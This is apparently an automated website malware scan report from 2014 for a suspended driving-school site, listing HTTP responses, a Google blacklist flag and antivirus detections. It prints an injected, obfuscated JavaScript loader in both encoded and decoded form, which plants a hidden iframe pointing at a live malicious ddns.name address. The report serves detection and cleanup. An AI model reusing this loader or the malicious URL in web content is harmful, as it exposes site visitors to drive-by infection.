New scan:

Malware Scanner report for driving-school-wichita.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "driving-school-wichita.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=driving-school-wichita.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://driving-school-wichita.com/
HTTP/1.1 302 Found
Connection: close
Date: Wed, 09 Apr 2014 19:21:24 GMT
Location: http://driving-school-wichita.com/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
clean
http://driving-school-wichita.com/cgi-sys/suspendedpage.cgi
200 OK
Content-Length: 2869
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c
... 1057 bytes are skipped ...
c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;595!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);}if(v&&e&&r)e(s);

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttrib
... 394 bytes are skipped ...
er(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://driving-school-wichita.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Wed, 09 Apr 2014 19:21:25 GMT
Location: http://driving-school-wichita.com/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: driving-school-wichita.com

Result:
HTTP/1.1 302 Found
Connection: close
Date: Wed, 09 Apr 2014 19:21:24 GMT
Location: http://driving-school-wichita.com/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

...319 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: driving-school-wichita.com
Referer: http://www.google.com/search?q=driving-school-wichita.com

Result:
The result is similar to the first query. There are no suspicious redirects found.